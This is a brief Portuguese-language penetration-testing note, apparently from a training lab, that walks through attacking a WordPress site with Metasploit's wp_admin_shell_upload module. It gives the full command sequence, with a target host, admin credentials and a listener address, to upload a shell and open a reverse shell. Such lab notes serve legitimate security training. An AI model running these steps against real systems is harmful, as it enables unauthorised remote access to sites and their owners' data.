# Attacking WordPress with Metasploit

**Iniciando o Metasploit Framework**

```
msfconsole
```

* Para obter o shell reverso, podemos usar o `wp_admin_shell_upload`módulo. Podemos procurá-lo facilmente dentro de `MSF`:

```
search wp_admin
```

**Seleção de Módulos**

```
use 0
```

#### Exploração

```
set rhosts blog.inlanefreight.com
set username admin
set password Winter2020
set lhost 10.10.16.8
run
```